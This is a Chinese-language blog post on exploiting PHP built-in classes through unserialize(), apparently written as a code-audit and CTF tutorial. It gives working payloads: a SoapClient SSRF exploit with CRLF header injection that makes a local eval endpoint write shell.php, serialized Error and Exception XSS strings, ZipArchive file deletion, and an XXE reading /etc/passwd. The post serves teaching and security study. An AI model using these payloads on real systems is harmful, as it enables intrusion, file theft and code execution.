<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="PHP原生类的反序列化利用"><meta name="keywords" content="php,反序列化"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>PHP原生类的反序列化利用 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><link rel="dns-prefetch" href="http://ta.qq.com"><script>(function() {
   var hm = document.createElement("script");
   hm.src = "https://tajs.qq.com/stats?sId=&lt;script type=&quot;text/javascript&quot; src=&quot;http://tajs.qq.com/stats?sId=66549793&quot; charset=&quot;UTF-8&quot;&gt;&lt;/script&gt;";
   var s = document.getElementsByTagName("script")[0];
   s.parentNode.insertBefore(hm, s);
 })();</script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SoapClient-call方法进行SSRF"><span class="toc-number">1.</span> <span class="toc-text">SoapClient __call方法进行SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#soap是什么"><span class="toc-number">1.1.</span> <span class="toc-text">soap是什么</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php中的soapClient类"><span class="toc-number">1.2.</span> <span class="toc-text">php中的soapClient类</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#toString方法进行XSS"><span class="toc-number">2.</span> <span class="toc-text">__toString方法进行XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Error"><span class="toc-number">2.1.</span> <span class="toc-text">Error</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exception"><span class="toc-number">2.2.</span> <span class="toc-text">Exception</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#实例化任意类"><span class="toc-number">3.</span> <span class="toc-text">实例化任意类</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ZipArchive-open-删除文件"><span class="toc-number">3.1.</span> <span class="toc-text">ZipArchive::open 删除文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GlobIterator-遍历目录"><span class="toc-number">3.2.</span> <span class="toc-text">GlobIterator 遍历目录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SimpleXMLElement-XXE"><span class="toc-number">3.3.</span> <span class="toc-text">SimpleXMLElement XXE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQLite3-创建空白文件"><span class="toc-number">3.4.</span> <span class="toc-text">SQLite3 创建空白文件</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/01.png"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">幸福不是故事，不幸才是</div><div class="follow-button"><a href="https://github.com/Dar1in9s" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">52</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">PHP原生类的反序列化利用</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-04-02</time><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">989</span><span class="post-meta__separator">|</span><span>阅读时长: 3 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>如果在代码审计中有反序列化点，但是在原本的代码中找不到可利用的类时，可以考虑使用php中的一些原生类</p>
<p>有些类不一定能够进行反序列化，php中使用了zend_class_unserialize_deny来禁止一些类的反序列化</p>
<a id="more"></a>
<h1 id="SoapClient-call方法进行SSRF"><a href="#SoapClient-call方法进行SSRF" class="headerlink" title="SoapClient __call方法进行SSRF"></a>SoapClient __call方法进行SSRF</h1><p>使用前提：</p>
<ol>
<li>需要有soap扩展，且不是默认开启，需要手动开启</li>
<li>需要调用一个不存在的方法触发其__call()函数</li>
<li>仅限于http/https协议</li>
</ol>
<h2 id="soap是什么"><a href="#soap是什么" class="headerlink" title="soap是什么"></a>soap是什么</h2><p>soap是webServer的三要素之一(SOAP、WSDL、UDDI)<br>WSDL用来描述如何访问具体的接口<br>UUDI用来管理、分发、查询webServer<br>SOAP是连接web服务和客户端的接口</p>
<p>简单地说，SOAP 是一种简单的基于 XML 的协议，它使应用程序通过 HTTP 来交换信息。</p>
<h2 id="php中的soapClient类"><a href="#php中的soapClient类" class="headerlink" title="php中的soapClient类"></a>php中的soapClient类</h2><p>php中的<code>scapClient</code>类可以创建soap数据报文，与wsdl接口进行交互。</p>
<p>用法：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> SoapClient::SoapClient ( mixed $wsdl [, <span class="keyword">array</span> $options ] )</span><br><span class="line"></span><br><span class="line">第一个参数是用来指明是否是wsdl模式</span><br><span class="line">如果为<span class="keyword">null</span>，那就是非wsdl模式，反序列化的时候会对第二个参数指明的url进行soap请求</span><br><span class="line"></span><br><span class="line">如果第一个参数为<span class="keyword">null</span>，则第二个参数必须设置location和uri</span><br><span class="line">  其中location是将请求发送到的SOAP服务器的URL</span><br><span class="line">  uri是SOAP服务的目标名称空间</span><br><span class="line"></span><br><span class="line">第二个参数允许设置user_agent选项来设置请求的user-agent头</span><br></pre></td></tr></table></figure>

<p>正常情况下的SoapClient类，调用一个不存在的函数，会去调用__call方法，发出请求</p>
<p><code>SoapClient</code>发出的请求包的<code>user_agent</code>是完全可控的，结合CRLF注入可以构造一个完全可控的POST请求，因为POST请求最关键的<code>Content-Length</code>和<code>Content-Type</code>都在<code>user_agent</code>之下</p>
<p>如果是GET请求，就简单得多，只需要构造好location就可以了。</p>
<p><strong>需要注意的是，SoapClient只会发出请求，而不会收到响应。</strong></p>
<p>一个例子：<br><code>flag.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>($_SERVER[<span class="string">'REMOTE_ADDR'</span>]==<span class="string">'127.0.0.1'</span>)&#123;</span><br><span class="line">    <span class="keyword">eval</span>($_POST[<span class="string">'a'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>index.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$c=unserialize($_GET[<span class="string">'a'</span>]);</span><br><span class="line">$c-&gt;ss();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>此时，构造exp.php为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$target = <span class="string">'http://127.0.0.1/flag.php'</span>;</span><br><span class="line">$post_string = <span class="string">'a=file_put_contents("shell.php", "&lt;?php phpinfo();?&gt;");'</span>;</span><br><span class="line">$headers = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">'X-Forwarded-For: 127.0.0.1'</span>,</span><br><span class="line">    <span class="string">'Cookie: aaaa=ssss'</span></span><br><span class="line">);</span><br><span class="line">$user_agent = <span class="string">'aaa^^Content-Type: application/x-www-form-urlencoded^^'</span>.join(<span class="string">'^^'</span>,$headers).<span class="string">'^^Content-Length: '</span>.(string)strlen($post_string).<span class="string">'^^^^'</span>.$post_string;</span><br><span class="line">$options = <span class="keyword">array</span>(</span><br><span class="line">    <span class="string">'location'</span> =&gt; $target,</span><br><span class="line">    <span class="string">'user_agent'</span>=&gt; $user_agent,</span><br><span class="line">    <span class="string">'uri'</span>=&gt; <span class="string">"aaab"</span></span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">$b = <span class="keyword">new</span> SoapClient(<span class="keyword">null</span>, $options);</span><br><span class="line"></span><br><span class="line">$aaa = serialize($b);</span><br><span class="line">$aaa = str_replace(<span class="string">'^^'</span>, <span class="string">'%0d%0a'</span>, $aaa);</span><br><span class="line">$aaa = str_replace(<span class="string">'&amp;'</span>, <span class="string">'%26'</span>, $aaa);</span><br><span class="line"><span class="keyword">echo</span> $aaa;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="toString方法进行XSS"><a href="#toString方法进行XSS" class="headerlink" title="__toString方法进行XSS"></a>__toString方法进行XSS</h1><h2 id="Error"><a href="#Error" class="headerlink" title="Error"></a>Error</h2><p>使用条件：</p>
<ul>
<li>php7版本</li>
<li>开启报错的情况下<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="keyword">new</span> Error(<span class="string">"&lt;script&gt;alert(1)&lt;/script&gt;"</span>);</span><br><span class="line">$b = serialize($a);</span><br><span class="line">$b = urlencode($b);  <span class="comment">// 因为有不可见字符，所以url编码一下</span></span><br><span class="line"><span class="keyword">echo</span> $b;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 测试</span></span><br><span class="line"><span class="keyword">echo</span> unserialize(urldecode($b));</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="Exception"><a href="#Exception" class="headerlink" title="Exception"></a>Exception</h2><p>使用条件：</p>
<ul>
<li>适用于php5、7版本</li>
<li>开启报错的情况下</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="keyword">new</span> <span class="keyword">Exception</span>(<span class="string">"&lt;script&gt;alert(1)&lt;/script&gt;"</span>);</span><br><span class="line">$b = serialize($a);</span><br><span class="line">$b = urlencode($b);  <span class="comment">// 因为有不可见字符，所以url编码一下</span></span><br><span class="line"><span class="keyword">echo</span> $b;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 测试</span></span><br><span class="line"><span class="keyword">echo</span> unserialize(urldecode($b));</span><br></pre></td></tr></table></figure>

<h1 id="实例化任意类"><a href="#实例化任意类" class="headerlink" title="实例化任意类"></a>实例化任意类</h1><h2 id="ZipArchive-open-删除文件"><a href="#ZipArchive-open-删除文件" class="headerlink" title="ZipArchive::open 删除文件"></a>ZipArchive::open 删除文件</h2><p>使用条件：</p>
<ul>
<li>要调用对象的额open函数，且open函数中的参数可控</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$a = <span class="keyword">new</span> ZipArchive();</span><br><span class="line">$a-&gt;open(<span class="string">'1.txt'</span>,ZipArchive::OVERWRITE);  </span><br><span class="line"><span class="comment">// ZipArchive::OVERWRITE:  总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖</span></span><br><span class="line"><span class="comment">// 因为没有保存，所以效果就是删除了1.txt</span></span><br></pre></td></tr></table></figure>

<h2 id="GlobIterator-遍历目录"><a href="#GlobIterator-遍历目录" class="headerlink" title="GlobIterator 遍历目录"></a>GlobIterator 遍历目录</h2><p>使用条件：</p>
<ul>
<li>遍历对象</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GlobIterator::__construct(string $pattern, [int $flag])</span><br><span class="line">从使用$pattern构造一个新的目录迭代</span><br></pre></td></tr></table></figure>
<p>使用例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$newclass = <span class="keyword">new</span> GlobIterator(<span class="string">"./*.php"</span>,<span class="number">0</span>);</span><br><span class="line"><span class="keyword">foreach</span> ($newclass <span class="keyword">as</span> $key=&gt;$value)</span><br><span class="line">    <span class="keyword">echo</span> $key.<span class="string">'=&gt;'</span>.$value.<span class="string">'&lt;br&gt;'</span>;</span><br></pre></td></tr></table></figure>

<h2 id="SimpleXMLElement-XXE"><a href="#SimpleXMLElement-XXE" class="headerlink" title="SimpleXMLElement XXE"></a>SimpleXMLElement XXE</h2><p>用来表示XML文档中的元素<br>一个例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$xml = <span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span></span><br><span class="line"><span class="string">&lt;!DOCTYPE ANY[</span></span><br><span class="line"><span class="string">    &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</span></span><br><span class="line"><span class="string">]&gt;</span></span><br><span class="line"><span class="string">&lt;x&gt;&amp;xxe;&lt;/x&gt;</span></span><br><span class="line"><span class="string">EOF;</span></span><br><span class="line">$xml_class = <span class="keyword">new</span> SimpleXMLElement($xml, LIBXML_NOENT);</span><br><span class="line">var_dump($xml_class);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">结果为：</span><br><span class="line">object(SimpleXMLElement)<span class="comment">#1 (1) &#123;</span></span><br><span class="line">  [<span class="number">0</span>]=&gt;</span><br><span class="line">  string(<span class="number">2393</span>) <span class="string">"root:x:0:0:root:/root:/bin/bash</span></span><br><span class="line"><span class="string">  ... ..."</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="SQLite3-创建空白文件"><a href="#SQLite3-创建空白文件" class="headerlink" title="SQLite3 创建空白文件"></a>SQLite3 创建空白文件</h2><p>前提：需要有sqlite3扩展，且不是默认开启，需要手动开启</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$db = <span class="keyword">new</span> SQLite3(<span class="string">'a.txt'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2020/04/02/php%E5%8E%9F%E7%94%9F%E7%B1%BB%E7%9A%84%E5%88%A9%E7%94%A8/">http://dar1in9s.github.io/2020/04/02/php%E5%8E%9F%E7%94%9F%E7%B1%BB%E7%9A%84%E5%88%A9%E7%94%A8/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/php/">php</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/04/03/php%E5%BC%B1%E7%B1%BB%E5%9E%8B/"><i class="fa fa-chevron-left">  </i><span>php弱类型以及一些函数的特点</span></a></div><div class="next-post pull-right"><a href="/2020/03/20/flask_ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"><span>flask ssti模板注入</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/18085.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/algolia.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script src="/js/katex.js"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>